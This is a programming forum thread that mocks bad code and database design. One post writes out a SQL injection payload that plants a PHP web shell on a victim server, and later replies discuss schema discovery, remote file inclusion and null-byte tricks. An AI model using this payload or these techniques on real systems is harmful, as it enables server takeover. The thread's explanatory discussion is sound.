|
point of return posted:
The other pathology is the reason that Fast Eddie has to delete inactive threads. It's because if he doesn't, the database will start chugging due to having too many tables, as the database has a table for every thread.

Please, please tell me you're making it up.
|
# ? Dec 31, 2011 01:21 |
|
McGlockenshire posted:
I ... I've never seen this one happen in the real world. Nobody is this stupid. Nobody.

sorry, there are worse things
|
# ? Dec 31, 2011 02:03 |
|
As somebody with no database experience whatsoever, how would a thread with its posts be represented? Each sub-forum a table, each thread a column and each new post a row?
|
# ? Dec 31, 2011 02:56 |
|
AlsoD posted:
As somebody with no database experience whatsoever, how would a thread with its posts be represented? Each sub-forum a table, each thread a column and each new post a row?

That is not how databases work. You could model it in three different tables: forums, threads and posts. A post would have a foreign key column to a thread, and a thread would have a foreign key column to a forum.
|
# ? Dec 31, 2011 02:59 |
|
AlsoD posted:
As somebody with no database experience whatsoever, how would a thread with its posts be represented? Each sub-forum a table, each thread a column and each new post a row?

code:
|
# ? Dec 31, 2011 05:23 |
csammis posted:
To expand some more on it, the basic idea is that you just lump all homogenous data together (all posts in threads are alike, so they all go together), have some properties/columns you can group the data by, and then the DBMS makes sure to store the data for you in a way so it's efficient to pull out all posts made in one specific thread or all posts made by one specific person, or similar.
|
|
# ? Dec 31, 2011 05:34 |
|
Suspicious Dish posted:
That is not how databases work. You could model it in three different tables: forums, threads and posts. A post would have a foreign key column to a thread, and a thread would have a foreign key column to a forum.

It's actually hard for me to imagine how you would model the DB so each thread has its own table. That must be pretty nasty.
|
# ? Dec 31, 2011 13:23 |
|
I'll start us off...code:
|
# ? Dec 31, 2011 17:00 |
|
Dicky B posted:
I'll start us off...

I counter with code:
|
# ? Dec 31, 2011 17:26 |
|
baquerd posted:
I counter with

&threadid=888%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2C'%3C%3Fphp%20system(%24_GET%5B%22command%22%5D)%3B%20%3F%3E'%20INTO%20OUTFILE%20'%2Fvar%2Fwww%2Fvictim.com%2Fshell.php'%2F*

(URL-decoded: &threadid=888 UNION ALL SELECT NULL,NULL,NULL,NULL,'<?php system($_GET["command"]); ?>' INTO OUTFILE '/var/www/victim.com/shell.php'/*)
|
# ? Dec 31, 2011 17:54 |
|
baquerd posted:
I counter with

code:
|
# ? Dec 31, 2011 18:38 |
|
code:
tef fucked around with this message at 18:58 on Dec 31, 2011 |
# ? Dec 31, 2011 18:56 |
|
tef posted:
Is this how you say "Come at me, bro" in PHP?
|
# ? Dec 31, 2011 19:30 |
|
Rainbow Pony Deluxe posted:
Is this how you say "Come at me, bro" in PHP?

No, this is the tvtropes forum javascript library in a nutshell
|
# ? Dec 31, 2011 19:34 |
|
AlsoD posted:
As somebody with no database experience whatsoever, how would a thread with its posts be represented? Each sub-forum a table, each thread a column and each new post a row?

As a general rule, if your application's everyday tasks involve creating and dropping (non-temporary) tables, or the number of tables in your database at any one time varies according to the application's state, you are doing something wrong. Each table in the database corresponds to things of a specific type. It is always wrong to have a system where there are multiple tables, one for each thing. (It is ok to have a system where there are a fixed number of tables, each table being for things of a specific type.)
|
# ? Dec 31, 2011 20:42 |
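The three-table model the replies above describe, as an added example that is not from the thread. It is SQLite via Python's standard library so it runs offline; the table and column names, the indexes and the sample rows are my own choices, and the last function shows what the foreign key actually buys you.

```python
"""Added example (not from the thread): forums, threads and posts as three
fixed tables with foreign keys. Table/column names and sample rows are
constructed for this example."""
import sqlite3

SCHEMA = """
CREATE TABLE forums (
    id   INTEGER PRIMARY KEY,
    name TEXT NOT NULL UNIQUE
);
CREATE TABLE threads (
    id       INTEGER PRIMARY KEY,
    forum_id INTEGER NOT NULL REFERENCES forums(id),
    title    TEXT NOT NULL
);
CREATE TABLE posts (
    id        INTEGER PRIMARY KEY,
    thread_id INTEGER NOT NULL REFERENCES threads(id),
    author    TEXT NOT NULL,
    body      TEXT NOT NULL
);
-- The indexes are what make "all posts in thread X" / "all posts by Y" cheap.
CREATE INDEX posts_by_thread ON posts(thread_id, id);
CREATE INDEX posts_by_author ON posts(author, id);
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("PRAGMA foreign_keys = ON")  # SQLite does not enforce FKs by default
    conn.executescript(SCHEMA)
    return conn


def new_forum(conn, name):
    return conn.execute("INSERT INTO forums (name) VALUES (?)", (name,)).lastrowid


def reply(conn, thread_id, author, body):
    return conn.execute(
        "INSERT INTO posts (thread_id, author, body) VALUES (?, ?, ?)",
        (thread_id, author, body),
    ).lastrowid


def new_thread(conn, forum_id, title, author, body):
    """A new thread is two INSERTs, never a CREATE TABLE."""
    thread_id = conn.execute(
        "INSERT INTO threads (forum_id, title) VALUES (?, ?)", (forum_id, title)
    ).lastrowid
    reply(conn, thread_id, author, body)
    return thread_id


def posts_in_thread(conn, thread_id):
    return conn.execute(
        "SELECT author, body FROM posts WHERE thread_id = ? ORDER BY id", (thread_id,)
    ).fetchall()


def posts_by_author(conn, author):
    return conn.execute(
        "SELECT t.title, p.body FROM posts p JOIN threads t ON t.id = p.thread_id "
        "WHERE p.author = ? ORDER BY p.id",
        (author,),
    ).fetchall()


def table_count(conn):
    """Stays at 3 no matter how many threads exist."""
    return conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type = 'table'"
    ).fetchone()[0]


def orphan_post_rejected(conn):
    """The foreign key stops a post pointing at a thread that does not exist."""
    try:
        conn.execute("INSERT INTO posts (thread_id, author, body) VALUES (999999, 'x', 'y')")
        return False
    except sqlite3.IntegrityError:
        return True


def demo():
    conn = open_db()
    horrors = new_forum(conn, "Coding Horrors")
    t1 = new_thread(conn, horrors, "one table per thread", "AlsoD", "How would a thread be represented?")
    t2 = new_thread(conn, horrors, "allow_url_fopen", "kitten smoothie", "I forgot to turn it off.")
    reply(conn, t1, "Suspicious Dish", "Three tables: forums, threads, posts.")
    reply(conn, t1, "AlsoD", "Thanks.")
    return {
        "tables": table_count(conn),
        "thread1": posts_in_thread(conn, t1),
        "thread2": posts_in_thread(conn, t2),
        "alsod": posts_by_author(conn, "AlsoD"),
        "fk_enforced": orphan_post_rejected(conn),
    }
```

Note the `PRAGMA foreign_keys = ON`: SQLite accepts `REFERENCES` clauses silently and ignores them unless that pragma is set per connection, so a schema can look right and still allow orphan rows.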
|
Fast Eddie's idea of "fixing" Solstace's page. As you can see, by replacing the hottips with something that doesn't parse, you, too, can claim your page is fixed.
|
# ? Jan 1, 2012 22:11 |
|
point of return posted:
Fast Eddie's idea of "fixing" Solstace's page. As you can see, by replacing the hottips with something that doesn't parse, you, too, can claim your page is fixed.

Haha that's amazing.
|
# ? Jan 1, 2012 22:38 |
|
BonzoESC posted:
&threadid=888%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2C'%3C%3Fphp%20system(%24_GET%5B%22command%22%5D)%3B%20%3F%3E'%20INTO%20OUTFILE%20'%2Fvar%2Fwww%2Fvictim.com%2Fshell.php'%2F*

(URL-decoded: &threadid=888 UNION ALL SELECT NULL,NULL,NULL,NULL,'<?php system($_GET["command"]); ?>' INTO OUTFILE '/var/www/victim.com/shell.php'/*)

How would a remote attacker know enough about the data schema to create a UNION query and copy the shell to that location? Unless you are just doing this hypothetically.
|
# ? Jan 2, 2012 20:55 |
|
iamthexander posted:
How would a remote attacker know enough about the data schema to create a UNION query and copy the shell to that location?

Some other system() commands previously to dump the schema!
|
# ? Jan 2, 2012 21:20 |
|
iamthexander posted:
How would a remote attacker know enough about the data schema to create a UNION query and copy the shell to that location?

I remember 8 or 9 years ago I ran a web server that I let other folks use. One guy I lent web space to created a "templating engine" where their URLs were all stuff along the lines of: code:
I stupidly forgot to turn off allow_url_fopen in the PHP install, which was enabled by default. So an attacker just had to hit code:
Thankfully this "feature" is no longer enabled by default in PHP. In PHP5 they split the access controls out for fopen() and include(), so under the default configuration, you can fopen() a URL but you cannot include() a URL.

kitten smoothie fucked around with this message at 21:30 on Jan 2, 2012 |
# ? Jan 2, 2012 21:25 |
|
kitten smoothie posted:
Thankfully this "feature" is no longer enabled by default in PHP. In PHP5 they split the access controls out for fopen() and include(), so under the default configuration, you can fopen() a URL but you cannot include() a URL.

allow_url_fopen doesn't stop it, because it still allows php:/// URLs: code:
|
# ? Jan 2, 2012 22:44 |
|
kitten smoothie posted:

This is a horror unto itself

quote:
Thankfully this "feature" is no longer enabled by default in PHP. In PHP5 they split the access controls out for fopen() and include(), so under the default configuration, you can fopen() a URL but you cannot include() a URL.

And soon, they'll get rid of the "feature" that allows you to pass untrusted user-input to file systems operations too

Suspicious Dish posted:
allow_url_fopen doesn't stop it, because it still allows php:/// URLs:

ahahahaha!
|
# ? Jan 2, 2012 22:55 |
|
iamthexander posted:
How would a remote attacker know enough about the data schema to create a UNION query and copy the shell to that location?

Trial and error for the right number of columns in the union (it's a natural/counting number); and the path can be done by seeing if they're on dreamhost and guessing or by using something that throws up an error page.

Edit: I had a metasploit 2 (the perl one, not the ruby one) module for doing this against phpnuke at one point.
|
# ? Jan 3, 2012 00:49 |
|
Well the obvious answer is reading the source (because it's open, or because of another vulnerability). Often with sql injection you can read the data schema out. Other times you get error messages with stack traces with column names. You can use wordlists too, and they're astonishingly effective. There is a whole lot of work around 'Blind SQL Injection' too. I haven't really been keeping up with this in the last decade so there are probably a few techniques I'm missing out.
|
# ? Jan 3, 2012 01:00 |
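The UNION payload quoted above and the column-counting answer to iamthexander's question, as an added example that is not from the thread. It reproduces the attacker's trial-and-error against SQLite through Python's standard library, so it runs offline: the `threads` and `users` tables, their rows and the vulnerable page query are constructed for this example. MySQL's INTO OUTFILE, the part of the payload that actually drops the web shell, has no SQLite equivalent and is not reproduced; the column-count probing and the UNION pivot into another table are the same.

```python
"""Added example (not from the thread): UNION injection column counting and
data pivot against a constructed SQLite schema, with the bound-parameter fix."""
import sqlite3

PAGE_QUERY = "SELECT id, title, author, posts, sticky FROM threads WHERE id="


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE threads (id INTEGER PRIMARY KEY, title TEXT, author TEXT,
                              posts INTEGER, sticky INTEGER);
        INSERT INTO threads VALUES (888, 'Coding Horrors', 'Fast Eddie', 120, 0);
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'constructed-hash-value');
    """)
    return conn


def vulnerable_lookup(conn, threadid):
    """The exploited pattern: the request parameter is spliced into the SQL text."""
    return conn.execute(PAGE_QUERY + threadid).fetchall()


def safe_lookup(conn, threadid):
    """The fix: parse the parameter, then bind it as a value, never as SQL."""
    try:
        tid = int(threadid)
    except ValueError:
        return []
    return conn.execute(PAGE_QUERY + "?", (tid,)).fetchall()


def count_columns(conn, max_cols=16):
    """Attacker side, as the thread describes: add NULLs until the UNION stops
    erroring. Returns (column count, last error text) so the error-page leak
    that guides the guessing is visible too."""
    last_error = None
    for n in range(1, max_cols + 1):
        probe = "888 UNION ALL SELECT " + ",".join(["NULL"] * n)
        try:
            vulnerable_lookup(conn, probe)
            return n, last_error
        except sqlite3.OperationalError as exc:
            last_error = str(exc)
    return None, last_error


def exfiltrate_users(conn, ncols):
    """With the count known, swap two NULLs for columns from another table.
    The quoted payload does the same thing to place a PHP string in a row."""
    filler = "".join(", NULL" for _ in range(ncols - 2))
    probe = "888 UNION ALL SELECT name, pw_hash" + filler + " FROM users"
    # Drop the genuine thread row; what is left came from the other table.
    return [row for row in vulnerable_lookup(conn, probe) if row[0] != 888]
```

Against this schema the probe fails four times with a column-count error and succeeds at five, after which `exfiltrate_users` returns the `users` row through a page that was only ever meant to show a thread. `safe_lookup` turns the same payload into a no-result lookup because it never reaches the SQL parser.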
|
It depends on what the exploiter wants to do. If they're looking for something specific like CC#s then yeah, they'll probably grab the schema/sys.tables. Most of the exploits I see now though are all about spreading viruses/other exploits, so they just prepend an iframe (with payload) to any text field and then TRUNC the rest.
|
# ? Jan 3, 2012 01:42 |
|
Meeting in.. ooh, 7h or thereabouts, where we all (developers) get round a table and tell them (Management(tm)) that we've finished testing. Just testing. Not actually fixed the 120-odd issues we found during the test cycle yet, but ho hum.

What's the horror? The fact that they expected a 4 week test+fix cycle to be done in 1 week, over christmas, when I'm the only one working out of 4 developers. Did I mention that they want a "released" version for an install on Friday? /kills self
|
# ? Jan 3, 2012 02:24 |
|
kalleth posted:
Meeting in.. ooh, 7h or thereabouts, where we all (developers) get round a table and tell them (Management(tm)) that we've finished testing. Just testing. Not actually fixed the 120-odd issues we found during the test cycle yet, but ho hum.

Similar-but-different situation as a contractor a few years ago, we wrote up a schedule and rough plan for a massive project replacing an existing ERP with a new, re-designed one. Our project manager passed the schedule on to the guy that was writing up the proposal and meeting with the potential client, and the guy saw the point "Planning Stage Complete: 12/03/06" and read that as "WE ARE PLANNING TO COMPLETE THE PROJECT ON THIS DAY", completely ignoring the 5+ months of work listed (and dated) after that on the same page. The client accepted the proposal, the guy came to us and said "It was accepted, the schedule is perfect so just stick to that" and on the 12th the client turned up expecting the entire thing complete.
|
# ? Jan 3, 2012 05:09 |
|
tef posted:
And soon, they'll get rid of the "feature" that allows you to pass untrusted user-input to file systems operations too

My favourite was the exploit where if you had a PHP file doing something like: code:
code:
|
# ? Jan 3, 2012 05:48 |
|
The poison null byte attack. In Perl, they would check the file extension with a regular expression (which would deal with the null byte), before passing it to open (which would truncate it). code:
|
# ? Jan 3, 2012 08:43 |
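The poison null byte and the user-controlled include path from the last few posts, as an added example that is not from the thread. It is Python rather than the PHP/Perl of the original so that it runs here; the template directory, file names and secret file are constructed for this example, and the C-level truncation at the first NUL is simulated, because Python 3's own open() refuses a path containing one. The hardened loader beside it also rejects the scheme-style names (`http://`, `php://`) that the allow_url_fopen discussion above was about.

```python
"""Added example (not from the thread): regex-then-open truncation bug beside
a hardened loader. Directory layout and file contents are constructed."""
import os
import re
import tempfile

EXT_RE = re.compile(r"\.txt$")
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.txt$")


def extension_ok(name):
    """The vulnerable check: a regex over the whole string. '$' anchors at the
    end of the Python string, so '../secret.conf\\0.txt' passes."""
    return EXT_RE.search(name) is not None


def as_c_string(name):
    """What a C open()/fopen() sees: everything up to the first NUL."""
    return name.split("\0", 1)[0]


def resolve_unsafe(base, name):
    """Legacy behaviour: regex check, then hand the (truncated) path to the OS.
    Returns the path that would actually be opened, or None if the check fails."""
    if not extension_ok(name):
        return None
    return os.path.normpath(os.path.join(base, as_c_string(name)))


def load_safe(base, name):
    """Hardened: allowlist the name, refuse NUL, and confirm the resolved path
    stays under base before opening. The allowlist alone kills traversal,
    URL schemes and NULs; the realpath check is defence in depth."""
    if "\0" in name or not SAFE_NAME.fullmatch(name):
        raise ValueError("rejected template name")
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, name))
    if os.path.commonpath([base_real, target]) != base_real:
        raise ValueError("path escapes template directory")
    with open(target, encoding="utf-8") as fh:
        return fh.read()


def demo():
    root = tempfile.mkdtemp()
    tpl = os.path.join(root, "templates")
    os.mkdir(tpl)
    with open(os.path.join(tpl, "index.txt"), "w", encoding="utf-8") as fh:
        fh.write("hello")
    with open(os.path.join(root, "secret.conf"), "w", encoding="utf-8") as fh:
        fh.write("db_password=constructed")

    evil = "../secret.conf\0.txt"
    bad_names = [evil, "../secret.conf", "http://attacker.example/x.txt",
                 "php://input", "index.txt\0"]
    rejected = []
    for name in bad_names:
        try:
            load_safe(tpl, name)
        except ValueError:
            rejected.append(name)
    return {
        "regex_passes_evil": extension_ok(evil),
        "unsafe_opens": os.path.basename(resolve_unsafe(tpl, evil)),
        "safe_index": load_safe(tpl, "index.txt"),
        "all_bad_rejected": rejected == bad_names,
    }
```

The two halves of the bug are visible in the result: the regex accepts the poisoned name, and the truncated path it hands to the OS is the secret file outside the template directory.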
|
That error message is the real horror. It is most definitely not a TypeError.
|
# ? Jan 3, 2012 15:01 |
|
Zombywuf posted:
That error message is the real horror. It is most definitely not a TypeError.

Are strings with a '\0' as the last character a different type to other strings? That would explain the message (as well as being a horror in its own right).

VVVVV: in Haskell, a strongly typed language, type and kind mean very different things. A kind is, essentially, the type of a type. What do you mean?

gonadic io fucked around with this message at 19:15 on Jan 3, 2012 |
# ? Jan 3, 2012 15:35 |
|
A string with embedded nulls is most definitely not a value of type null-terminated-string (seeing as how it's not even representable in that type), so how is passing such a thing to a function expecting a null-terminated-string not a type error? Is this sort of like the hungarian thread where people insisted that there was an inherent distinction between the "type" and "kind" because they're used to weak type systems?
|
# ? Jan 3, 2012 17:56 |
|
Plorkyeran posted:
A string with embedded nulls is most definitely not a value of type null-terminated-string (seeing as how it's not even representable in that type), so how is passing such a thing to a function expecting a null-terminated-string not a type error?

If python had that kind of dependent structural typing in any way shape or form then you might be on to something here. It doesn't however.
|
# ? Jan 3, 2012 18:59 |
|
tef posted:
the poison null byte attack.

code:
|
# ? Jan 3, 2012 20:04 |
|
python ruby
|
# ? Jan 3, 2012 20:22 |
|
kalleth posted:
Meeting in.. ooh, 7h or thereabouts, where we all (developers) get round a table and tell them (Management(tm)) that we've finished testing. Just testing. Not actually fixed the 120-odd issues we found during the test cycle yet, but ho hum.

This is so familiar.
|
# ? Jan 3, 2012 20:44 |
|
I was digging around one of our application DBs today rather than do the work I'm supposed to be doing and I've found the work of some kind of insane genius. This app is from 2004 and has cripplingly poor search performance that we've never really spent time looking into in any detail, it turns out that the search is hitting the DB roughly as follows....

1) Aspx page makes a call to a stored procedure with the search criteria, there can be anything up to 40 of these although some are always null, others don't exist or can't actually be specified in the web front end.
2) The procedure defines a shitload of strings.
3) The strings are used to "dynamically" build a query by churning through nearly 1000 lines of SQL that works something like this: code:
4) The query times out because it includes a call to a scalar function that uses a cursor to pull out related data (across a linkserver) for every row of the result set. If you use an instring text search for something fairly generic (i.e. the kind of thing you might search for) this takes the execution time directly on the DB from like 1 second to 3+minutes as it churns through thousands of calls to this stupid cursor function. The page timeout is 30 seconds.

All I can think is that it was intended to provide some kind of query optimisation by cutting out excessive JOIN operations for queries with small numbers of attributes, but why on earth would you do it like this.

Bonus: The DB has a function declared to convert a passed date into the format 03-Jan-2012 by using string manipulation. This is functionally identical to the results of convert(varchar,getdate(),106)

Edit: Extra bonus, the view used for the search is badly written so all queries have to have "DISTINCT" whacked on the front of them to return sane results which is always a mark of a well thought out db structure.

Powerful Two-Hander fucked around with this message at 23:25 on Jan 3, 2012 |
# ? Jan 3, 2012 23:13 |
|
Powerful Two-Hander posted:
Oh god.

That said, the dynamic query isn't the problem here, if you want poo poo to work you need to scrap the one-line-at-a-time methodology and return the entire resultset at once. Reminds me of a TDWTF where an address-book application was coded so that to search for users was to run a query for users, then for each user call a stored procedure to get their address.
|
# ? Jan 4, 2012 06:59 |
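The one-query-per-row pattern from the two posts above (a cursor function called for every result row, or an address lookup per user), as an added example that is not from the thread. It counts statements against SQLite through Python's standard library so the cost is visible without a profiler; the users/addresses tables and their 50 constructed rows are my own, standing in for the address book the TDWTF story describes.

```python
"""Added example (not from the thread): N+1 lookups beside the single-JOIN
version, with the statement count made explicit. Data is constructed."""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL);
        CREATE TABLE addresses (user_id INTEGER NOT NULL REFERENCES users(id),
                                city TEXT NOT NULL);
    """)
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(i, "user%d" % i) for i in range(1, 51)])
    conn.executemany("INSERT INTO addresses VALUES (?, ?)",
                     [(i, "city%d" % (i % 7)) for i in range(1, 51)])
    return conn


class CountingConn:
    """Thin wrapper that counts every statement sent to the database."""

    def __init__(self, conn):
        self.conn = conn
        self.statements = 0

    def execute(self, sql, params=()):
        self.statements += 1
        return self.conn.execute(sql, params)


def search_n_plus_one(db, pattern):
    """One query for the users, then one more per user: the pattern in the posts."""
    users = db.execute(
        "SELECT id, name FROM users WHERE name LIKE ? ORDER BY id", (pattern,)
    ).fetchall()
    out = []
    for uid, name in users:
        city = db.execute(
            "SELECT city FROM addresses WHERE user_id = ?", (uid,)
        ).fetchone()[0]
        out.append((name, city))
    return out


def search_joined(db, pattern):
    """The whole result set in one statement."""
    return db.execute(
        "SELECT u.name, a.city FROM users u JOIN addresses a ON a.user_id = u.id "
        "WHERE u.name LIKE ? ORDER BY u.id",
        (pattern,),
    ).fetchall()


def compare(pattern="user%"):
    db1 = CountingConn(make_db())
    rows1 = search_n_plus_one(db1, pattern)
    db2 = CountingConn(make_db())
    rows2 = search_joined(db2, pattern)
    return {
        "same_rows": rows1 == rows2,
        "n_plus_one": db1.statements,
        "joined": db2.statements,
        "rows": len(rows1),
    }
```

Both functions return identical rows; the difference is 51 round trips against 1, and the first number grows with the result set, which is exactly why a generic search term is what pushes the stored procedure in the story past its timeout.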
|
Matlab 2011b Help on MException, the matlab error class posted:
The f* functions are basically the same as in C. fread doesn't throw errors if it is given a valid file id, and there is some other error, such as a network outage. There are other errors that can occur during read (out of memory, etc.) that are passed silently. And as a nitpick the disp line is redundant. This would just be run of the mill bad but it is literally the example that Matlab gives for error handling in their own documentation, for a relatively new error handling technique that they want people to use.
|
# ? Jan 6, 2012 04:37 |
|
|
From the desk behind me:code:
Zamujasa fucked around with this message at 10:00 on Jan 6, 2012 |
# ? Jan 6, 2012 09:57 |